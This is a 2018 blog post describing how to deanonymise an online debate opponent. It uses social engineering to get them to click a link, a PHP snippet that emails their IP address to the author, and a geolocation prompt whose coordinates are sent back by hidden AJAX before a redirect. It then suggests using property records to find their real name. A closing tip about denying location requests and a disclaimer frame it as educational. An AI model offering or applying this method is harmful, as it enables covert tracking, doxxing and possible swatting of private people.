Geolocation `Attack`: Entrapping your anonymous opponent online

How to misuse the Geolocation API to strip your online opponent’s anonymity. And, how to save yourself from it.

Google Chrome: Consent Popup frequently seen for websites requesting your real location

Someone giving you a hard time during a discussion online? What if you could find out where that commenter is, or who they are?

But also, look at this the other way — what if they could trick you into revealing your real location and name?

That is one of the ways the HTML5 geolocation API, frequently used by most websites today to ‘know your location’ can be misused.

If you are not familiar with Geolocation, head right over to W3Schools.

But anyway, the actual “attack” is pretty straightforward and requires a bit of social engineering. When finding yourself caught up in a heated debate about hot button issues — whether on Reddit, Medium or anywhere, you would want to say something like “Look here http://your-website.tld/some/page. The statistics don’t lie. You’ll see my point… blah blah blah”.

Credit: https://medium.com/@benjaminsledge/honest-thoughts-from-a-veteran-about-gun-control-and-mental-health-c74930488e28

FYI, the get_geolocation link above is fictitious — I’m trying to show you I could create one on my website and then have you redirect to the actual page that proves some of my claims.

High chances, if you are debating with someone who is seriously intellectual and not just trolling, they’ll click on the link out of curiosity.

This is where the magic happens.

The link should lead them to a page controlled by you. At the very least, a one-line serverside code will reveal their IP address:

<?php
//email me their IP
mail("me@my.email", "Opponent's IP", "IP is: ".$_SERVER['REMOTE_ADDR'])); //Redirect them to the actual page
header("Location: http://redirect/to/the/actual/page");
?>

To make it look more legitimate, you can redirect the user to the actual URL which loads the resource that supports your argument. If you don’t do this, a blank page will either raise suspicion or enrage the “opponent”. They’ll likely call you an “idiot” for posting a dead link.

There are other ways to retrieve the IP address of a visitor too. Note, that this applies to anyone who clicks your link not just this visitor, so don’t be so confident that the IP you get is this user’s alone — unless you were going back and forth with only one person in a heated debate.

You can then use an IP tracer or a simple API to reveal in what City and Country is the IP and hence the user, likely based — this won’t work well if the user is on an anonymous VPN, for obvious reasons.

So, why not also inject client-side JavaScript code on the page which asks the user for their location? HTML5 Geolocation API, other than relying on the IP address alone, leverages a couple of data points (such as Wi-Fi SSIDs, GPS, etc.) which can accurately identify the user’s location.

Credit: https://www.w3schools.com/html/html5_geolocation.asp

If they are careless, they may just click ‘Allow’ not giving it a second thought, to dismiss the popup. Then after a few seconds, once you retrieve the coordinates, you could have your page send it to your server using a sleek AJAX request, behind the scenes, and then have your page redirect the user to the actual resource related to your argument. Simple enough and gets you the exact coordinates of the user.

If they live in a big enough house, you’ll likely know exactly where they are. Take it a step further and the public records, property / deeds county records will even reveal their real name!

Beware though, the same social engineering tactic can very well be used against you — no one likes to be doxxed or SWATted so read this piece as a mere weekend entertainment and to safeguard yourself, instead of getting adventurous.

Next time you see a website requesting your consent for your location, unless it has a good enough reason to, best to click “Deny”.

Credit: Google Maps

Stuff my lawyers make me say…
Disclaimer: This article is meant for educational and entertainment purposes only. My intention is for you to safeguard yourself and think twice before revealing your location to apps and any website requesting it. Do not violate any laws in your area and respect the privacy of others, much as you’d prefer yours to be respected. I will not be responsible if you get yourself in trouble, break any laws or infringe on the privacy of another person.

© 2018. Akshay ‘Ax’ Sharma. All Rights Reserved.